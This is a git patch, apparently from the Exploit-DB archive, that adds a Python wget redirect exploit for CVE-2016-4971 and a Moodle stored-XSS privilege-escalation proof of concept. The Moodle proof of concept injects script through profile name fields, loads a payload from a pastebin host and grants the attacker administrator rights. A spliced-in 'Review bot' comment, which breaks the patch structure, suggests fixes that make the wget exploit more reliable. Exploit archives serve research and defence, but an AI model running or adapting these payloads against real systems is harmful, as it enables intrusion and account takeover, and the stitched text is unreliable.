From 23c2c2fa040a77fe14a1c53aff75feb7ce0c0ac9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 1 May 2021 05:01:55 +0000
Subject: [PATCH] DB: 2021-05-01
4 changes to exploits/shellcodes
GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)
FortiOS < 5.6.0 - Cross-Site Scripting
Fortinet FortiOS < 5.6.0 - Cross-Site Scripting
FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure
Fortinet FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure
FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)
---
 exploits/hardware/webapps/47287.rb | 2 +-
 exploits/hardware/webapps/47288.py | 2 +-
 exploits/linux/remote/49815.py | 54 ++++++++++++++++++++
 exploits/php/webapps/49814.txt | 81 ++++++++++++++++++++++++++++++
 files_exploits.csv | 10 ++--
 5 files changed, 143 insertions(+), 6 deletions(-)
 create mode 100755 exploits/linux/remote/49815.py
 create mode 100644 exploits/php/webapps/49814.txt
diff --git a/exploits/hardware/webapps/47287.rb b/exploits/hardware/webapps/47287.rb
index 48eca7846..a1c4a2e0a 100755
--- a/exploits/hardware/webapps/47287.rb
+++ b/exploits/hardware/webapps/47287.rb
@@ -1,4 +1,4 @@
-# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
+# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
 # Google Dork: intext:"Please Login" inurl:"/remote/login"
 # Date: 17/08/2019
 # Exploit Author: Carlos E. Vieira
diff --git a/exploits/hardware/webapps/47288.py b/exploits/hardware/webapps/47288.py
index 8e0cde795..3b7cf322d 100755
--- a/exploits/hardware/webapps/47288.py
+++ b/exploits/hardware/webapps/47288.py
@@ -1,4 +1,4 @@
-# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
+# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text.
 # Google Dork: intext:"Please Login" inurl:"/remote/login"
 # Date: 17/08/2019
 # Exploit Author: Carlos E. Vieira
diff --git a/exploits/linux/remote/49815.py b/exploits/linux/remote/49815.py
new file mode 100755
index 000000000..2526442ce
--- /dev/null
+++ b/exploits/linux/remote/49815.py
@@ -0,0 +1,54 @@
+# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)
+# Original Exploit Author: Dawid Golunski
+# Exploit Author: liewehacksie
+# Version: GNU Wget < 1.18
+# CVE: CVE-2016-4971
+
+import http.server
+import socketserver
+import socket
+import sys
+
+class wgetExploit(http.server.SimpleHTTPRequestHandler):
+
+ def do_GET(self):
+ # This takes care of sending .wgetrc/.bash_profile/$file
+
+ print("We have a volunteer requesting " + self.path + " by GET :)\n")
+ if "Wget" not in self.headers.get('User-Agent'):
+ print("But it's not a Wget :( \n")
+ self.send_response(200)
+ self.end_headers()
+ self.wfile.write("Nothing to see here...")
+ return
+
+ self.send_response(301)
+ print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n")
+ new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)
+
+ print("Sending redirect to %s \n"%(new_path))
+ self.send_header('Location', new_path)
+ self.end_headers()
+
+
+HTTP_LISTEN_IP = '192.168.72.2'
+HTTP_LISTEN_PORT = 80
+FTP_HOST = '192.168.72.4'
+FTP_PORT = 2121
+FILE = '.bash_profile'
+
+handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
+
+print("Ready? Is your FTP server running?")
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+result = sock.connect_ex((FTP_HOST, FTP_PORT))
+if result == 0:
+ print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT))
+else:
+ print("FTP is down :( Exiting.")
+ exit(1)
+
+print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT)
+
+handler.serve_forever()
\ No newline at end of file
diff --git a/exploits/php/webapps/49814.txt b/exploits/php/webapps/49814.txt
new file mode 100644
index 000000000..7d0e5d370
--- /dev/null
+++ b/exploits/php/webapps/49814.txt
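Review bot: `self.wfile.write("Nothing to see here...")` in the non-Wget branch of do_GET passes a str to a binary stream, which under Python 3 (the file imports `http.server`) raises TypeError after the 200 status and headers have already gone out, so any non-wget client gets a truncated response and a traceback in the server log; it should be `self.wfile.write(b"Nothing to see here...")`. The guard just above it has the same fragility: `self.headers.get('User-Agent')` returns None when the header is absent and `"Wget" not in None` raises TypeError, so `if "Wget" not in (self.headers.get('User-Agent') or ""):` would make the branch reachable. Two smaller points at module level: the probe socket returned by `socket.socket(...)` is never closed after `connect_ex`, and `exit(1)` should be `sys.exit(1)` since `sys` is imported for exactly that and the builtin `exit` is not guaranteed outside an interactive session. The file's leading indentation is lost in this rendering, so I have not checked block structure.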
@@ -0,0 +1,81 @@
+# Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)
+# Date: 04/2021
+# Exploit Author: farisv
+# Vendor Homepage: https://moodle.org/
+# Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip
+# Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16
+# CVE: CVE-2019-3810
+
+Moodle is a learning platform designed to provide educators, administrators,
+and learners with a single robust, secure and integrated system to create
+personalised learning environments.
+
+The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for
+privilege escalation from student to administrator.
+
+1. Upload the XSS payload [1] to pastebin or other similar service.
+ Change the value of userid to your own id.
+ Let's say the URL is https://pastebin.com/raw/xxxxxxxx.
+2. Login to your student account.
+3. Set first name with:
+ " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
+4. Set surname with:
+ ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
+5. Ask the administrator to open /userpix/ page or put the link to that page
+ on your post and wait.
+
+If successful, your account will be added as administrator.
+
+See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810
+
+[1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id.
+
+var webroot = '/';
+var userid = '3';
+var sesskey = '';
+
+function get(path, success) {
+ var xhr = new XMLHttpRequest();
+ xhr.open('GET', webroot + path);
+ xhr.onreadystatechange = function() {
+ if (xhr.readyState > 3 && xhr.status == 200) {
+ success(xhr.responseText);
+ }
+ };
+ xhr.send();
+ return xhr;
+}
+
+function post(path, data, success) {
+ var xhr = new XMLHttpRequest();
+ xhr.open('POST', webroot + path);
+ xhr.onreadystatechange = function() {
+ if (xhr.readyState > 3 && xhr.status == 200) {
+ success(xhr.responseText);
+ }
+ };
+ xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
+ xhr.send(encodeURI(data));
+ return xhr;
+}
+
+function setAdmin() {
+ // Assign administrator access to userid
+ bpath = 'admin/roles/admins.php';
+ data = "confirmadd=" + userid + "&sesskey=" + sesskey;
+ post(bpath, data, function(data){});
+}
+
+function getSesskey(data) {
+ var sesskey_find = data.indexOf('"sesskey":"');
+ sesskey = data.substr(sesskey_find + 11, 10);
+ setAdmin();
+}
+
+function payload() {
+ // We can find Sesskey inside JS script in main page
+ get('', getSesskey);
+}
+
+// Start
+payload();
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e9e885dba..1baf008cc 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18445,6 +18445,7 @@ id,file,description,date,author,type,platform,port
 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux,
 49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix,
 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware,
+49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)",2021-04-30,liewehacksie,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40613,7 +40614,7 @@ id,file,description,date,author,type,platform,port
 42381,exploits/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",webapps,php,
 42543,exploits/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,webapps,java,
 42387,exploits/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection",2017-07-27,"Shahab Shamsi",webapps,php,
-42388,exploits/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,webapps,hardware,
+42388,exploits/hardware/webapps/42388.txt,"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,webapps,hardware,
 42401,exploits/jsp/webapps/42401.rb,"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",webapps,jsp,
 42402,exploits/jsp/webapps/42402.rb,"Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload",2017-08-01,"James Fitts",webapps,jsp,
 42403,exploits/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",webapps,php,
@@ -42222,7 +42223,7 @@ id,file,description,date,author,type,platform,port
 46163,exploits/windows/webapps/46163.txt,"Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection",2019-01-14,"SySS GmbH",webapps,windows,
 46164,exploits/cgi/webapps/46164.txt,"AudioCode 400HD - Command Injection",2019-01-14,Sysdream,webapps,cgi,
 46168,exploits/php/webapps/46168.txt,"ownDMS 4.7 - SQL Injection",2019-01-15,"Ihsan Sencan",webapps,php,80
-46171,exploits/hardware/webapps/46171.py,"FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure",2019-01-16,"Julio Ureña",webapps,hardware,443
+46171,exploits/hardware/webapps/46171.py,"Fortinet FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure",2019-01-16,"Julio Ureña",webapps,hardware,443
 46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80
 46173,exploits/php/webapps/46173.txt,"doorGets CMS 7.0 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80
 46174,exploits/php/webapps/46174.txt,"ShoreTel / Mitel Connect ONSITE 19.49.5200.0 - Remote Code Execution",2019-01-16,twosevenzero,webapps,php,80
@@ -42668,8 +42669,8 @@ id,file,description,date,author,type,platform,port
 47283,exploits/php/webapps/47283.txt,"Integria IMS 5.0.86 - Arbitrary File Upload",2019-08-16,Greg.Priest,webapps,php,
 47284,exploits/asp/webapps/47284.txt,"Web Wiz Forums 12.01 - 'PF' SQL Injection",2019-08-16,n1x_,webapps,asp,
 47286,exploits/php/webapps/47286.txt,"Kimai 2 - Persistent Cross-Site Scripting",2019-08-19,osamaalaa,webapps,php,80
-47287,exploits/hardware/webapps/47287.rb,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)",2019-08-19,"Carlos E. Vieira",webapps,hardware,
-47288,exploits/hardware/webapps/47288.py,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure",2019-08-19,"Carlos E. Vieira",webapps,hardware,
+47287,exploits/hardware/webapps/47287.rb,"Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)",2019-08-19,"Carlos E. Vieira",webapps,hardware,
+47288,exploits/hardware/webapps/47288.py,"Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure",2019-08-19,"Carlos E. Vieira",webapps,hardware,
 47289,exploits/php/webapps/47289.txt,"Neo Billing 3.5 - Persistent Cross-Site Scripting",2019-08-19,n1x_,webapps,php,80
 47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
@@ -43983,3 +43984,4 @@ id,file,description,date,author,type,platform,port
 49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution",2021-04-29,"Leonardo Paiva",webapps,php,
 49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php,
 49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple,
+49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",2021-04-30,"Fariskhi Vidyan",webapps,php,